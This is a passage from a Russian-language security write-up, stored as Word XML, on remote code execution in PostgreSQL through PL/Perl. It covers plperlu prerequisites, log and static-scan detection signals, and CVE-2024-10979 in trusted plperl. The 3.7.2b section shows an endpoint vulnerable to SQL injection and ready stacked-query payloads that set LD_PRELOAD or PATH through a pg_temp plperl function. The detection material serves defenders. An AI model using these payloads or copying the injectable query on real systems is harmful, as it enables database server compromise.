          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> row для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имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lanpltrusted = false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, доступ через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ACL).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должно быть установлено (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Если не установлено — superuser ставит сам (тоже требует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OS-зависимости:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на сервере должен быть Perl-runtime (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">perl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и postgresql-plperl пакет (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql-plperl-17</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postgresql-plperl-16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и т.д. в Debian/Ubuntu; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql17-plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в RHEL).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нет специальных требований.</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plperlu используется для админских хелперов, которым нужен доступ к OS: парсинг файлов конфигурации, легковесный shell-вызов из триггера. В production-кодах встречается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">редко</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что обычно вытеснен внешними batch-скриптами на cron. Признаки атаки в логах:</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'ddl'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FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не-DBA сессии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, по сетевому источнику). DBA создают plperlu-функции редко и в постоянных схемах, не в </w:t>
      </w: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ddl_command_end</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 здесь можно отлавливать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prolang = 'plperlu'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и алертить.</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pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для функций в </w:t>
      </w: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содержит backtick-shell-вызовы, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">system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qx//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — статический сканер по слепкам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Аномальный исходящий трафик с DB-хоста (см. 3.7.1 — те же сигналы).</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plperlu стабильно работает с PG 9.0. Никаких CVE в самом plperlu (untrusted) — он намеренно без sandbox; security-граница на уровне привилегии CREATE FUNCTION. CVE случались в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2024-10979, см. 3.7.2b; CVE-2010-1170 «trust» через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и др.) — это сценарий выхода из sandbox в trusted-варианте.</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PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива с похожими привилегиями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или superuser). COPY PROGRAM не требует CREATE EXTENSION, поэтому быстрее для one-shot.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3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — путь к Perl-RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> superuser через trusted plperl.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3.7.3 plpython3u / plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — те же untrusted-механики, другие языки.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension scripts: компрометация .sql-файла расширения в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHAREDIR/extension/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт пре-installed RCE через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(актуально, если plperlu установлен через скомпрометированное расширение).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг для протаскивания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... ; SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через одну точку инъекции.</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«PL/Perl — Perl Procedural Language» — https://www.postgresql.org/docs/current/plperl.html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«Trusted and Untrusted PL/Perl» — https://www.postgresql.org/docs/current/plperl-trusted.html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HackTricks: «PostgreSQL injection» (раздел RCE через plperlu) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection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PortSwigger SQLi cheat sheet, PostgreSQL section — https://portswigger.net/web-security/sql-injection/cheat-sheet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Rapid7 Metasploit: модули для plperlu RCE — https://www.rapid7.com/db/?q=postgres+perl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R7 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.2b CVE-2024-10979 в plperl trusted (путь от PUBLIC)</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До PostgreSQL 17.1 (и параллельных minor-фиксов) trusted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неверно ограничивал доступ к Perl-переменной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Sandbox должен был блокировать модификацию environment-переменных backend-процесса, но позволял её. Атакующий с правом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION LANGUAGE plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (выдано PUBLIC по умолчанию) может изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{'PATH'}</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$ENV{'LD_PRELOAD'}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; следующий подпроцесс, форкнутый backend-ом, наследует изменённый env — что даёт PATH-hijack или library-injection и в итоге RCE как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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Единственный путь к RCE без superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в категории 3.7.</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app/api/reports/run.py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@router.get("/reports/{report_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def run_report(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_id: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обычная application-роль; не superuser</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execute_report({report_id})")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await session.execute(query).scalar()</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report_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + application-роль с правом CREATE на собственной user-schema (либо до PG 15 — на public). Стакинг (см. 3.5) даёт инъекцию payload-функции в той же сессии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — LD_PRELOAD-инъекция</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый PoC (из репозитория gh-ost00/CVE-2024-10979 и разбора RedRays).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `report_id`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1); CREATE OR REPLACE FUNCTION pg_temp.preload() RETURNS void LANGUAGE plperl AS $perl$ $ENV{'LD_PRELOAD'} = '/tmp/x.so'; $perl$; SELECT pg_temp.preload();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execute_report(1); CREATE OR REPLACE FUNCTION pg_temp.preload() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plperl AS $perl$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  $ENV{'LD_PRELOAD'} = '/tmp/x.so';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$perl$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.preload(); --)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Функция создаётся в </w:t>
      </w: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(без CREATE на основной схеме — temp-схема всегда доступна), исполняется. Sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до фикса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. После выполнения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> установлен в env backend-процесса этой сессии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — PATH-hijack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1); CREATE OR REPLACE FUNCTION pg_temp.hijack() RETURNS void LANGUAGE plperl AS $perl$ $ENV{'PATH'} = '/tmp:' . $ENV{'PATH'}; $perl$; SELECT pg_temp.hijack(); --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">То же самое, но меняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
